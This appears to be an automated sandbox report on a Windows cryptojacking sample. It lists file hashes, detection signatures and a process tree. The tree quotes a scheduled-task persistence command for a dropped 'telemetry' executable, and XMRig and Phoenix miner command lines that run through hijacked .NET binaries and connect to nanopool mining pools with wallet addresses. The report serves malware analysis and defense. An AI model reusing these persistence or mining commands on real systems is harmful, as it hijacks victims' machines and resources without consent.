Analysis
-
max time kernel
292s -
max time network
290s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
-
submitted
11/03/2023, 22:34
General
-
Target
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
-
Size
903KB
-
MD5
7b205c65f9092ee01c821aa5b58bcc6b
-
SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb
-
SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
-
SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
-
SSDEEP
12288:8D5lJ0RelUsuvM/vPmyTIPjdgRSzYr9MUlu1vZdptUG5decIljrG:8D5lWYlUsuvMH+36e70
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Detectes Phoenix Miner Payload 8 IoCs
-
XMRig Miner payload 18 IoCs
-
Executes dropped EXE 2 IoCs
-
UPX packed file 11 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies registry class 36 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 56 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe"C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4F3E.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
-
C:\ProgramData\telemetry\Y.exe"C:\ProgramData\telemetry\Y.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 04⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\telemetry\Y.exeC:\ProgramData\telemetry\Y.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 02⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
903KB
MD57b205c65f9092ee01c821aa5b58bcc6b
SHA128f2aeded861c37d6fd90ddb791721a653079cfb
SHA25690ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA5121661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
-
Filesize
903KB
MD57b205c65f9092ee01c821aa5b58bcc6b
SHA128f2aeded861c37d6fd90ddb791721a653079cfb
SHA25690ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA5121661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
-
Filesize
903KB
MD57b205c65f9092ee01c821aa5b58bcc6b
SHA128f2aeded861c37d6fd90ddb791721a653079cfb
SHA25690ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA5121661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
-
Filesize
4.6MB
MD5412ff258a6e1abc84d63455fdccfaf14
SHA1b34119a96f9f0f3f994a3996681af99c013a8332
SHA256f87a06752fd48643260a706ffc0b9f4b1c9ef0f152290437e566ee2551e18c84
SHA512ed1a42ed5ebe311bcd26250ce00afb3fd11f8c1acb750b4b4917a4ad447dbe8067ff846dfcae22327100d7fbcc4d1e38d946007287f0feae17b2115d31276413
-
Filesize
5.1MB
MD5a3d7148655137e92c28b33e48d088088
SHA1bc98804abf481e58c925a0810c519c6c5f2d3ac0
SHA2565b0bfb92bb76a12c69669a08ef723377b9eaaf50eab6fe83b4c3f21d593f998f
SHA512ca131ce06bc6cbd47a58cc11f80a4db576effa3325f11222123fd6829589f29f894834679e09c3e50a50ef8019325d1a6fffab07d49fda43179a544ea4697373
-
Filesize
1KB
MD59bfb0f51f319fb79c0bb1f4f9fcfc7e1
SHA1367776be8a224b0ee8271dce1723eb675a1964b2
SHA25635d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3
SHA5120b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb
-
Filesize
97B
MD5a535a8db27a4fd76abda97fafeda70ca
SHA12b0f0ac8df6cdadea89c8be24af0f61eb4aab00a
SHA2564eda9dfb2cd9be7ed729e375804d0abbcb0b3fd47bdb2004296ca655ccc54b5f
SHA5126b95d3fd692fd8c7725ed45895c8a1019c0463efedb023b8fc39ddbe66924aeb1964ca0987f118412100abf5801b31cbfa30f5954d07340d6490c2b0af715ede
-
Filesize
139B
MD521078cfb3172e51fd65219c2b13140c5
SHA1b4ab61c4b043d7185b89b00524325a2d0c606ea8
SHA25631e07a1d7ec0b6e15641f0eee447ef7efa861e647732af0ff2a025d8572dd24d
SHA512d4f818ca39c16c6e5b5800900338c78e66ef4c227407b3e0d14bc8c5d7b75cc335dd0c126853a5626b16d222066bb29ba34b56678e5686ebad7b2ff73df90bbe
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
8.2MB
-
Filesize
8.2MB
-
Filesize
8.2MB
-
Filesize
8.2MB
-
Filesize
7.8MB
-
Filesize
256KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
920KB
-
Filesize
64KB
-
Filesize
8.2MB
-
Filesize
8.2MB
-
Filesize
8.2MB
-
Filesize
8.2MB
-
Filesize
8.2MB
-
Filesize
8.2MB
-
Filesize
8.2MB